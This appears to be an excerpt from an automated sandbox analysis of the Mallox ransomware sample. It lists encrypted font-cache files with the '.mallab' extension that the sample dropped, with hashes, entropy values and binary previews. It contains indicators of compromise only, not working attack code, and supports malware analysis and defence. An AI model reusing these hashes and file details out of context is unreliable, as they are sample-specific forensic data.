                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):503066
                    Entropy (8bit):7.999633538649736
                    Encrypted:true
                    SSDEEP:12288:guzVtE049Njcz+FbAiqP5xkM3Evv5kvxE5HWYLYcEQ/IGcLncgK:g2IcE8iqR8vv5TMYs1q4K
                    MD5:E429B753B94A3EFBE3BAA85CA61D3261
                    SHA1:B702196519AB235DFB10495D2A9C21E963BF674E
                    SHA-256:FC9CF18138B7693E6716A0D2F7463705CA5AFCCDE907D0282AD5A52612201ECE
                    SHA-512:DB31DDA68EB6428DC46B9799D44C2A78599C9D94E50B5BA0C4BFA52F29670E6A79E7AB658C043DBEAAE2B4CBF99C9775F37E3F27DCB8FFEB68E0D2DF7464D6C1
                    Malicious:true
                    Preview:.y...t=.(.....Uyg......w.. .h_I7....C....L...QV6.=...z.~..r.x...!....%.lf...{..;....^.Q............... ....,6...H.{.g.g>YO..0&.3gn\...c.8...1Uq.*.>i..P......MPO.f:bF.#y502.H..T.R...n.a..M..!vTv.....\..~La.->^.#n...Q.../..G4..g...he.f.C....o.#z|=x.....\.wJ.....+B....B.3(..>F.2...p...^.o..K..S.a...8...a......S.1.E.O._..*..x.u.).0..5.6...........E..w..l..`.mnq.'#..P...[.CnV>.el..7..y...M.....{..u.8.k.r....'.7...ZA.F.....k.......g...Z#...B.Wf.P...p..kiK$.vrI[...$.. =....(.....)g.Le...^t.R...S......T..\U.v\.^..J.k...l!%.n...G..j&\........A.u~&D.u..3k.-...h.....A..O..t...-...hr/.............FK.$.cV...k.&..%|..n.Z.Y..O+...........uK..Vid^....E.U....D._.......C.?kD...7V.E...w..........u2.l.[..].B.==.?..tC...Q^g..)..!..-.=.g.O.3V...n...Y...Z..<.(..........p.....<.w..)[.\.]....}`er.*F...........V..(..YI..i.(.F...8<U2.\..8.Q....8.|r.%.e/2$.v...O..S..=%p.z.....=.S...5..)ZO...>w.$pD4......m......*`#..(..C...Gn...t.AH.'.2v.o..V.............U.Z....7.B[+.7.

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238028
                    Entropy (8bit):7.9991304438394115
                    Encrypted:true
                    SSDEEP:6144:h3QJ83alW77n4BNouykBDr4uTAeB1RIkpSsQryhM:ZQJQF7ULHVr4uTAeB1R5pSHryy
                    MD5:D0C3C931EBCEBA797C515B254C5FAF58
                    SHA1:629D25A846B9ABFC1114710B0D9EBF36744A8149
                    SHA-256:B08EA0825CDF3F603ACFF01091C1347D7804442F3D90F3A8E320839A6571DD01
                    SHA-512:8946C4396E57CC18228EBD9B24D3977A1034B788CC9A6C9F245F11B0AFA47C6C6343AE6819F4484456F7CAFB0DDCFDBB9910A285689A0D50370FB89F26B661A0
                    Malicious:true
                    Preview:..:.^gB.......h.....-....w.....z...J.l=..4O...?.}..Jd=.*...9..^H.....7........!LR.P..:..;V.....3...[S..*v...s...0...R...K~].?..#.!.......:I!..6..J..?.....*_.=.`..8..t}..R.. ..WV....M.<..n.e...K..r..J..F.s.9J.&y.j.,m...o...x..Q;Jb3.;~....b....5.q+.)$~...OMq.7.f`LB...2..k..P....C4M.h..M]..?..(..@..]:di...\...<...;..?..Y..&1*....(...t.. ....v+...B...._....`D..].j...Y..U.e^...+.".....z....v...N.#..i....\.!\?f0I..CXQ.l.9.....t..9^..k.G............S>`.,.G%_q.K"..l...........l..........l$.>.X....R.nY.U...#..H...q.+$.5..'.>.@...l...Z......h.h..Q...... ....-.+.6.y...d>.p4-....D....]..;..2....r.....*..W....K.......{.G.F..U./..D......;........zb.q..# K..\......m.=....d......%.>.O.d..'99.].....vbj']%.....~pQw....w....G..[6f.+..|.WX.R.2..y..mz.'..-<........t..0..{Y...k.<...:..7em..SN.........g..z.\Snx&........A{>.."a...w..L.....%V.L....>@..J.&.Y.,.E.R[.X....yU...+3.n.(......|.u...f....bIA`Ca.h.....D[d.$...2YL.;.Y #K......s...r3...G

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240656
                    Entropy (8bit):7.999224754658942
                    Encrypted:true
                    SSDEEP:6144:UMjwxBgOaNeCgnGtlDylVPpSPFk3Glg2AL:DjwxBHainqh4VKKGlnG
                    MD5:D5D1EA81831990C349E047F8F4045C7C
                    SHA1:051A8E1AE63E3F522B368FABD1E619686512D72F
                    SHA-256:FFCFA9623A16ACFCC9003AB1E6C8A24FB098F42DAC86686C78F64563D4E5CEA1
                    SHA-512:0C7030C4F3AA13DF9E2E6883AFD63A8ED5197C48B3BF594F5E2659EFC13E30B06F697232A17BFA191AD7D1B3862581F10A090F6AFF59C5604F4C6ADBCFA11B6A
                    Malicious:true
                    Preview:|usr.~#....B^s.....'..}.X...REB<..:Cv..G]L......qy.R.l..;.....M..^.<....".Q..G8h8n^....}(...~%.Q..1O2....1v.$.*....-j...i..<.P#.9....=....F5*...2:..}.U......l|..;.../.%4.W.h.............q..fK.=`..V..R..B...j.B....v.H...J1.."....k.M...+#.K.j.]K. .!..Dk....08#..z04}=[..H...ud...$z.L......'...U.@ 5t....gW..M).....m.V/..a.F....-.(.#..._.]f...=..;.^..t0%!1.........,."...4 @*0..o9...........;.VtY.....qe.s)..7....A.R.d.Q......b.....{.....BN.iy[ .wU.j.kT...\3...F....3..j....n ...+..n... ......:..8.s.G...lYo....$..D.Q<...A...~..j\.y].e...4..t..$.qF.R)...j..&.jC.J.y...wt..[.......;....(....Tp.!).PG.@.....F+f.{.s.7d.f...........Vwv.h..q./...|.....#..D....V..K.>~[!..:.K....E.(fR......\.....c.5..U...J..{E..h9.._Hf.|.:...e<.^.."..lF.q....'.....C.u.Lo|.7QN.."...A..@.n.J..*`|.\s5..f.q.U.. .?:1.RU).7.Z..?H.c.P...N....Jr>Y......<wz..%>.t.,.....]xW.Z%.O8..9...3......l..K+4K..x.N...*.j.gH.....\O......iG.........\........^..xb.'w\../]\U....t...G..tT.@.9...

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241524
                    Entropy (8bit):7.9992451256817985
                    Encrypted:true
                    SSDEEP:6144:mX55e5tigmoCyo8ewfD0RCl80JEMRnsz8U2Wju0Kfpsy:mJo+fvySU0RC7JEIszGHpsy
                    MD5:43E4F46A9B61C011E99E45AE96DB5DEF
                    SHA1:B51A3199F99EF8CFD78D66E39A8D4D2AF3BC7175
                    SHA-256:7B429719490D1DA8D1D69F9F68B8A9D1BA18A80255A1DF352F2A1322642ED38F
                    SHA-512:4A18990625DB6B3E3ADF58188FEF0BAE845E061D15BFFDC94202E3261DC77F9CA9C3D77708FA3933EF2452634B97438B92DAE6D384F9304118D4265D554CEDF1
                    Malicious:true
                    Preview:....v.t}5.n...4...O@;.....u..2..+.en.....;7N...Q.!P5o..gI..p....S.m.{.<o.Ef..].T!q.'.V......<.P..1k.:i.........Soe=b.w...`=.T..<.x.@...9qo7.P.v..Y<..A.y....<T+oKb$..0Qo..<Ri>........!...X/....y.V'..u..3R..).k&...z...R...-......H*.9......+[......4..... ....).`-..!.A@A. $4H..~?+/3.`.g........}......ZF..L......h....jU....Ei.`EW..D6........5...n..<U.[..a.nf7.'G.p+.'t.prs..4.l.l.......&O....K.......N;..A.ibZh...-..x.../...j..(.j+.;=\;.......:.9DY.!n.ms..]..V.o..l._.Y$.....t"..M..k...l.a..Ap+d$....a.n,.t..g..X>}.ZM_M........-.B9d..v4..?.1K..V....#7.b.-.....L}..(..P..9...%..1.'...p.}8....W2e....."...O...........)...]$..1...t!v.."!00M|ISO.Pc.S2.M.D....4.m..(._..J.9....iE..*....S..G.......jw. .%.....G.....L.=.......g.*. R.5JzU.N.o..n.%.!....@6..C..U..q.OL......(.X..e.J.".{..6Y../..V.s.2$...-.C....h.b./....i.&x.4i..@.k.+E.G..@!.."..t.Z...5.j&.....#N..z..q.P9K..kQ......F.TP|Q..Y.5W?m.....S..1.....bo..w.I2V..eV.n.[..`.b.7J..|.c.....O..7.+h........M

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238736
                    Entropy (8bit):7.999238896257288
                    Encrypted:true
                    SSDEEP:6144:IhhnoBsrcxAIPOme7rh/fNJUb55DBODp0o5:IhhnoScxBWL757Ut5Ds10K
                    MD5:60597DF00338FF207DA58845BF979DBA
                    SHA1:089F7CBE7DF152D474175BF2AEF6582D86BC113D
                    SHA-256:75C83C425A6B839BA0873F8B03A2264FCC3B2D68442C8EDA1EBCF60B6F23C100
                    SHA-512:42F4C6184DFCD704D2E554D1FF4B6B1D7AAB5D7181C45F0B34EC462AF2409F35A9D454D08BB82BE048239BB06753C224D236B483CB43892566BE439FD115E574
                    Malicious:true
                    Preview:.X.I.U..|.C/C.2.......vS........T....o......}..TV...A....d...^.Lv..k.j..'R&..!F...\S.:...... @s.&.imd......i.}..SH.rd)..7L.\c4....K.Oq.@.h..F.!..#..j.s....3>m.ZV.w..B.Fw.9)...?.2...=S.B.#7..D.'Y........C.].w....C..6.......Tp..v..7..........q...<.....w...~..(<.K.e..-....^.@..a."/.Yz,-8{..*P.W....R..X....G....6...;.-........yr.Ag..{/.`So.W..2.6.?u.2..V..M.).(.....5.W...1R....p<.a.Z.......i..T:.ZQ8...t..j.=.t.|...`$....5n..h.l.....t..1"..__....3.n..../....Z2.VJI.......o..|...m.0.S........F.D7../.s.<. .%...j..*L.......O.....R.Z.a.=.1.W.?....~....K&E.....&.....(.9..u.W.X.....8n...D....*.......95w.y..b.G.pl..,..!...f.z......F>.w.I.y..>D{....Ma*E]..L?L.9..>hS.~._N....t`M:.7..f..C..........)..c...zl?_e..z..=]..G%..AR6t.1s..=..6..%1d.g.[m.....E....I..gw....!.>.fj.....C....H....fo.o....!.X.y..X@"..F.=..o.0..v.....*..U]....../G.!.N....U.......Q..1..8....1...`.G..=}%..8..1Q..+;..hb.....n.a.Z.E.....L....gj.S...~....G..v..)z.?..F..LG.7....Q...>...&...

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237676
                    Entropy (8bit):7.999326451971584
                    Encrypted:true
                    SSDEEP:6144:UIfxV/5CvlOAF5hw3YRodETmrC+wWA6DO2JhgC2xFVAH02k:UIfxV/58lDJEYR0E+8W97J6C2xFiH0v
                    MD5:D95D88591E7E6DFCE944B3B03A8BF8EB
                    SHA1:47DFA340313610DC3088A206667BE97D53C15C45
                    SHA-256:1590A4EB23E5D8C9D28CA3F4177C0D33B48D7A191B68BF8ABCF3CA04FF0DE385
                    SHA-512:18614F076787DA993C9C213CBEC4D89EB3806F4CC64E9BCF44995812E97FC910991BCECB2A2F1698A2115B7B643771A8A593771567C358E2BAF96DF3D8E1B063
                    Malicious:true
                    Preview:.-..4....FzF`...&ee....#?...s.....zP.!V......A...6...t. i+.s.cm4`.IB1.w....^..qd.n$0..~T.s.AH@>..V.]....c...$...<P4tShJW.}...z.. ....&..!...:%.k......V........R.H....~.....^x.;.l<......A..T..<:....I{2r...0:.....D2}.K.j..$..Q..>..C3.n...Y.=^....~..C.X.?..O_..A.A .\.....Q...yu..>.c.....&...w..\z..D.|.....|.I.Ev..R.m...j.l..oHc.....FTa..j...@]...6fK....&......5y.1..e.:4...s.K.........,..\.....x.Q>.....;Zv....n..%E..j..e.._..7J..,[.'pg$..4...'...e x.."...).......#V..........#...I.....&...... F.Q.=}s..cA..q....v.a.........u.]...&~.u.w....yl../..WS...|Hr...n..0;H.<N[Xk.N........>.jEpMb............$l$r..%.~s!.A......c....$<.T`.8H.(.......J.>#As.h...0.#...N.=..vafP..@..5d.l.Ns..8pX..4..H.76]..J.&.i."...%.A..Y.....|.p.Z&i}}.z+.D..:..X.J0z0e.&G.N'&Y.f..SW@?.;c.GoEH..{T;......D.YA..;..&Q../Y@.Gz......Z.....C..g...L........).D....Q.4(. .....B..Q....^@o.V.E.L...0....w..X..2......j\m..#.Z.<._...._hJ..d]..D$4......[_..9..N..G..Ve.U.....b..{..._

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241152
                    Entropy (8bit):7.999362155408254
                    Encrypted:true
                    SSDEEP:6144:A++i/ShreXkivQVuLzF3Da0rXDywG7Lr+btL:r5S8UyXxDa0na7Lr6tL
                    MD5:B3EBAFD3913C799C595061938F194E99
                    SHA1:F2187704BA94B5FC89C38D86DF5FF14B6EBC0ADF
                    SHA-256:AA51E777DB340FBC327781AC4D5CB0798EA70EDEA180BEBF27794B136CD50020
                    SHA-512:1A20260F97BF74C7DE897C56AABBF5A9973811685C2B7BC6300AC7F8F562E5A6C567F30815E5E1FBF7E2D00B50B740DA5749F3D858D0E2269C3C2A84AFC1141B
                    Malicious:true
                    Preview:8.(h....Ja!r7h^.;.sHO.s.....B.....W.U..!.}WA!.......7.BU.M.'...>..Y......Y.f.O.U..`.`.Y.Yo.R5Vm[....gzw;}..Gt....A......p.f...o....]F..s.Q...7....qp.m.-.^....OG.i.t.^..7....#.f.DQW.g....t..#.KQ{E....E.9Y.U..........0p.B... ..:..c..'d..r..`.-.....-..&Br.W7=..4.r....L.(.Y.r...w....++5.8u.`.Ja......{....b.62...}...i....03...?.!3...k...9.4>."h<*.>..f;...hC.d.~<c....[.-X..V.,....qL.U..j10>a.%..9..Q...*.P.y......7^X.....&.P%.Q.S.~n...,P..m...t.Yuhe...._...>.js.....)_.......Wx.)V..... .$m..q...c.">b.`A*....f..x...q.:.L?....J.FS..}s.T.....~.=.....N...f..$..E.>....<0.^..0m.m5.G.a.......$..OH..SQ.$.). k..-.#.a..^.J.....CY.|$.34fl5gh..?4...c.Dh|.aE...4.M.B.#.~R....O3...V#/..W7...de`...J....;DB....8.T..p.Duw.6VK....x.m..jNEi...d.m..s......Y...|....R......M..8.'1.....i...3zQv..C.... O....1...bU.m*.xK@.L..d.#".4.o}......J.........\V..mX.j..u....J.|.k.c`oU.....z...CG...A..B..$.;.{ab..6........Yw..j.<!.|?B.|4.z.0..Ww.'.{.....e..v...2.=..jf..Q...j...1.F.6.

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237512
                    Entropy (8bit):7.999158778911604
                    Encrypted:true
                    SSDEEP:6144:TCi5wUPet8CWR4x7NkZNIJ0J27ccnmjufdl+ENZVVQA:TCswUPetPWW9NkZNIHc81Bt
                    MD5:6F3061D7BFF31772EB68512135A48C9A
                    SHA1:F8419240A423D0D73A8AD2837D4C36F2BA58D0AC
                    SHA-256:3C46900DF9FA695F8E146C2FBD1B42729D5D8D6DE766C1DF6D3993F725AFC451
                    SHA-512:F4499CF7D1097FF62146DF94876376746B67FF4F6175E6EE27291C59C6AE50F086D9F4C9C066F6F9A5114F4918896778AD1AF9479D774E319BBAC12CCF33E0F8
                    Malicious:true
                    Preview:....f.C....ZM...l..5.9..9..\.A.*?O....4.........qeY..A9.L..b..9..]P..2q..+....)...i!...............6q...k]...(.Q..2.M..A...Q^.Uij.....aT...`@Y-..!S..s.G...p.G....-....v.9.j...I...|.#...6..U.w..q..w.L.V@....>.....Le.Y.......}m.........j{.%........Tg.w..Ow/.QKT'DG.......Dp...*.Uh.k..=.."....^T_.....7QQy!_.x)6h#.=.....woM..Rks..y.+/..^./.5.Y..b|../X..G.....86...tk...3.d.{W@...G.dW6...h..o3..[.L.X.;......~.....[VF.LR......=......... ..,-.&..w.h...a.<..Wl.:...@.'p.TW....d..D.t. (h.Ux........koN.&.}.K.P.P..My1.k.'J .K........A.F..e.H/.........p..e#Y8j...l..56..J.u.Z.k.....oj...m...Z.-q6k.z.........X....G...=.v.E.Z.s-.....X.D~\.f.T...~..*.hu............6.e^...e...* c9S#%fn....m....6i.`...`G.A.(..]Z.&.r")..B.A.....uN..rk..T]U..#[.4...f/u)K..<...T....n0k.I.[.C..r".@..../i.d........f.H#'\FK{7uM(`..D.m8.-..+..>.e=.......S........=.8Y..e....'..;y. ...r..X....{O.de.`....Z|a..h..%KD)3...rk.rU.+4..|.>...Y...s.cu.y.P*\%.Fj.....(........@,..M\.:.y.%...>

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240480
                    Entropy (8bit):7.999199978135356
                    Encrypted:true
                    SSDEEP:6144:yWP1T/DMU33w+DwzAk0WA8gA5b3j1RJG6Q6KTCBYTJM9JT:7P10iDwzA5A5Tj06dYTq7
                    MD5:DE53CCD51C68BB066FAC2F669B91F480
                    SHA1:20F2DD123AB3BFC1951426B6879FCB6486790E14
                    SHA-256:5A0E91BF0091FF5163A2E1B7141AE1B6E4C26FA305FD3D6C85703FC46ED4F862
                    SHA-512:62F77B2440BBCF6886474567F31D25E94044DC4C3AF75F1370C197E3B5F7C20BEE86B99F76633152BBCD0AF7D97A73D7F20379DBA4160537971D9D94032266AD
                    Malicious:true
                    Preview:]&7.........@qj[....5L..~.l.".6....#..xP...-.T.......X}../g..A.X96.9y...gu.. .....q.36X...3.;2...s.)....#<....}f}j../$.Ap..vzO..(]...<.K.n.....S........O...R....$.b%..t.."#...M....=6.${`...G.qd.Ms]...5..+........?.d...R..:#X.5...cKk.&f.dy.F.D.6.....[.\iO.+......'...'J..Ixa.%=..{&....V.....w.eUKT...u,.'.t.v.i......U..hy....b.uC*`.....a.q.....to...\Z...}.....l...rp....zT.6..NX..+.[....3.wN.b.......tL.n2...8wA..Y........He..\..Vt-.hf.Q.^D..: .5%..D..l^.{.va...,...4..J9.....`AH@."E5VI4..}.f.h....B...v..\...=....R&69$!......F1..yAe.&Z...:..X.....=.4...gK.%.[\.._..V?.....b..o..X`.Z..:...H.Zkl.$^..$.b...gP7q~p.3a_H.O.; ...|\....=)..r.h.....I..3Ec..J.{...O./.]rC..>..h..l....:.L....Wc..;v.Nl7.heR$....3.+.?.Wo...<..O.2..3..2...>... .7'._...%.$....}`AWe..h#.p.V ...s.g./.B0....;..'..0h.U9#L......e.m.^dd..... .....[?W.3.S.2x....`...F...L.$.}.,.9D..8....a...r..'U.R.r.0.T.~Ws...a......."..Fj2F..`v..w.....yx."..N.sg.+.096....3.qD....'....<....?D.kO7.

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):238292
                    Entropy (8bit):7.999216541998309
                    Encrypted:true
                    SSDEEP:6144:mXrNdSL8LF3bnv0hdYiZauQe/cbP8T7vqFewyBXB:mbNdS4BnvqdzZ/6sQeHXB
                    MD5:85D94B63008C22A2B3DB546FF610A14E
                    SHA1:467C1A030A26CC064359CE0A12343C4E52CE06A6
                    SHA-256:BF51662BB7F9E8279A7EFA49B73D26A974530D73A5554838D962F78B43A58AA9
                    SHA-512:07D1833307ED14054A8B640189215AD968E9C75E2015D00E40318E1CF797137DF8C9DB61FD78F10548F3F50226B4E6AC9ED0B264688B1E8C0834CBB2E289FCFB
                    Malicious:true
                    Preview:..h...5(..qx!..6..}!...NAh.0."g......a.x....S...t.t\...g@n4..bkN..R.;.z......a.Lz....\)e..M..D&.8.w.#...7...?...epc..(Z.....}(..jZ.7..m.....;........aw..aa.K..JS....,C[#........t...M...{0..k.0..Or..Ty9...n..0s.z'BL..Q...d.]U.^."...|5.p-P.+O../....b.h.{.?.5...8r5.....oa.....+p.. .n..#...d....#Z...u...8&.,.......5n.....&..w..}f.=.I@..-W..3u....!....tcH`XW.S/...`*).m.;...Y@n+u...5%Y..-...a.q.x....`Z.S.'{%RN.Gn....,y.d.v.k.1.\.*....%.s6..Q.._ '.t-..X(...&.r.dK.,='.=....Bo...WL0T;G........UD."5...h...V....9.|.(..)_3X.^.(X y.2W..PXs.z;.....'\..3....!.= 2.G...-j..m.]TW2|..[!+.^h".6.@R."!(..!..u^}s.7.-.....,?P.....@.J/.....$...0.7.%v...&.H.....#.....&...l..UsI..rCq.2..6m#.SE.}.>.......A/(.....&...p.....Y..Ad.....wZ..N.h..$.#e...-.98..O.,L......{...ks..K...-;..H.q]..5;".b.~.N..U.dQ...].N"&..Bh....!`yq.. Z*.c..o.B.1..,._..$..D..5g.cu..m.....*.$......v>..N.....R*...."......2^m..v..7.......QS.W...S....JhF]......^.9.{p.....B.......V..G..c'

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241056
                    Entropy (8bit):7.999239679662125
                    Encrypted:true
                    SSDEEP:6144:wEzUrgHFBPGqJRetzXl9BYb1sJL2ZZ3lh:rzUwFBP3eZl3Yb182ZZ/
                    MD5:4911085FBA3319DD3B0C32E490CAEDD6
                    SHA1:56891476F0B883E0C4B90F72842561332EF197BE
                    SHA-256:163B3FB040778B99544A5B64CC9E58E840B0CB99A8E3258498693E5157E2C77A
                    SHA-512:198E22C900AC1656569B5CDB2801C7D780C1F06AF3B0BEFF0F07C4A813B714460C217B3F0E72DA7FF1B80B136B77FD831BDD2C38F3D9EE6D2A012545B5E32CDE
                    Malicious:true
                    Preview:...*..-....|.|.I...~....=...uH.9......A..GX'.1.3..../...A+l../`..U..m..k.bMT.D.Yw&.L........8..0....5...].C..=%.c....Z|N..Z.or6-i....T..p.xQ....).........Y6......i.b< ....H...+`..d.....5.Z..........G.:.|0.J?q...T....q.........R..yZ...Gl.{..B7.rk..C.....vk...X.2>aB.o...e.R..+.qE..`./.1(.J.Ev..!.....U.#...Q..f@....U....>|..u*.[.!OQ.U..ws.zWvi~...E.....=fg.*.U4/.S....4..@.:........\..O.G.U...3.;.yB2C.82.xSL.."4Q.?:kf&r:.b..#...B....(...O...O..V.j...+"........<.8.......v...4.rx...K...O....;...0...F..G.{.S.XL.4...)JJ..]Q..b....8.vJ....^iB.q.@@.....S\........8>V48.6....r.iA~...Q.....1.T.....d..._$*....f-e.....-....Y.n?.).5....}.+...=..-.pS.>.s,j..|.A.}.7...w..B..:f6......El.....K...>....#......6.....j.5.2..-'q..:../E..T..........z..U.....dZ......0..J.`..9?...T......YX.7..`.dK...V..p..<.,..3...e..@.7....2./-.I!....(.B9=X..R..o.N....a.-...{.....s..K...%.SWY..1g.[.^N...c.|...^.@.....]......3...H%.O.,J.-..z.....9.%.NZ..9.Z....17...MS..3U..

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):237720
                    Entropy (8bit):7.999248880348446
                    Encrypted:true
                    SSDEEP:6144:vMqxK9EcpzWw/EgxguqC3S6Swv2bwbfTv:lMFzj/EgxxMT0bT
                    MD5:6BEBBB9DA4C2E9DDD5B272B2D097DC5E
                    SHA1:F1C1675C74C5A9BC513C4E04E720FEE8DBECF6C8
                    SHA-256:DEF8F01629BE75BB93F90311AD10C51A749C67A4F0AE36C6A56DC313C7791E45
                    SHA-512:6A0D3D984591BCE58EB229DE898CB7C5E2E84E171938556C9742D34DF0C498147B4007EC44B19D1E2FC47F1D3500C8BE5F2CA79A1B4B453E46B012FAAA711F19
                    Malicious:true
                    Preview:1f...X.~.....@......GE~.G....0m.$.w......q..3Q../.KT.#.7..S......{......Tx.i.....(i./_...l_G....X....jB5..:.6...cv..i.......a'..1q...../.!?..E..c..-.!..C....P.-.[$...x.^.{?/.$..F.T....7....S...x#.*..0b.yD...N.\_+}...i...N..%.........'..D[9v..o&W.@.....i.6!.2....U....X.Y....i.L.t..z..0i==.l....v.-...9N...J.X...q6.(.M...:..a?...x..x{..e.G....nN..)y. ...P.h..zviu.W.i.}.ka...............-.wa9L..G.G.Y.^..Ck.O...I..Ti..x...!.LZi..p.g\...(C.u>Y..c...M..<...uw.F..S.Wo.BPl.]..8$u7....V.}q)..Hr........OR...|....r.3.F..qC..Q.....fT..\..................5o?..;.).....8.....pBr..i..S}}.=...aF./Y......(<L.Q..p...`.N.:r..Y].*K&M..#...td...Qy.j .#..e.w.Q.1..t\Q(..6.;.6F7)T8...B..D...P......5..:cA..TD08........`.I...k...L{.......f....)[.:m.Q.nH...G.....P.).#.....@.Bs.i....?.Q#.....Mg..t.pH.Dg.fSL.rc..yovj.k.I.).`k....R...v.R.h..y..e....+..x......}.&.4^l_.4..O..o.G.q..W\.@....=#..+..O2.=*...l....k....[...g/.8_.....~.m......w..g..QG......k...R.W.=.

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240244
                    Entropy (8bit):7.999224921312251
                    Encrypted:true
                    SSDEEP:6144:gUjVaknVMY0Q3uNl9J+lHobppnUqhoAhP39L/jZEvMhPT6:gURtOQ+XfYHanUqhoaZ/evMhT6
                    MD5:C1E65F9CD6779861E06927C452F2BA82
                    SHA1:D795E6C1B1BDE97C1493B4CD15F918732462D08C
                    SHA-256:B28F4C9852F1BD33C8E9D658A34119A0B6F1408F1F504EFE85CC862890B604D7
                    SHA-512:906ADFB262BC4470EE74EDFBEDA7D7C3036ECA8EF532CB5DE9E81C4A63581FBCC297EB57D5446D68A1306B9F9038A296C84F0589A3CA54C8974AF8FD4441EACB
                    Malicious:true
                    Preview:^....5^.?..i.=.. _..{X!.H.d...$..d.r.i....&.X...N!...K..S..0...#=ck..6'do.......9.k#qIDJ.J...0.l..HL...1.Wr.p...X .$..G....sxZ..n........zSZ$....TY...d.q]...@U.H. ...l%d.j8z..O...D..).&.l....`O......[T..ek..X..=.`8..%/.^.).|..g.X_!.Mz.........m.&).I.S.1FI..A.3..C.-p.7l..B...~..}l.ah..R`.Q..D...l^.e...#...q...f...$.j.p....c}W.k`.t.....z"..ZVP..y..g0;].,.2I.p.\.........u..f.O......=..*...`f.8..*.Y.@JCh..%.`..RJ...u.L.%......>F(..I~..<.W{).p.jw..UGO...;.Wy?t...........R5\...0..PN6._.....J.E!\..Y[.:%?.).<cCOE....]i.f.i.I.....-.........'pX6r..^hz.7._.;.|....nU..lVb...#.-].M..B.....9.b.1.:.K....J..y..:C.q.G....6.....-.*..>bvE"R.+...F>...%.(..P...5...\y...?.Q*..y..[..'c<k...Y.*....A...L=^..z.!.g0.T.$....@`..7..._...I}........Du.J.r....d8.b.......u..,...!|...ZI3.....E...0...{....S.x..'...nI~.H..7.ZZ.<......E[.1.'Cp|.(..2"....(...u....v.u4&~).._&u...3y....m..w$.&......a.<.{.7..).m....ZP=&.....e.&..t.pAr..v.l.x^.].Pt.t...G?.<s-.Y.=..;8J-)..Y.._...7>.4..8U

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):758940
                    Entropy (8bit):7.999720667207387
                    Encrypted:true
                    SSDEEP:12288:1mGCyMwcPyp1rbnCgzl/ZIVPdnUHdMBGl5FN+TiJ3kV9O8H0ij7J+VcoXAfUDr8K:1mGkwCyvigVmdegE5PNiJToXAir8D+
                    MD5:E44EFCB9499DC0BA6BADF7283EC6EC28
                    SHA1:42ABD0C21CECBD0A19D2276096213EF108D2C2A6
                    SHA-256:D287DE09902398F3E84AAA6FDE1EC2670FEEA24D4DF7C23628710CDCC132B0F7
                    SHA-512:64BC99677158D6303E5990A26EFBE8A0A5AFBA1F483EE86FCAD278047AF481ABA8C008099E88856DBB1C3BB4B48221F9D7E9553FE880821CAFCDCCAB74A5216A
                    Malicious:true
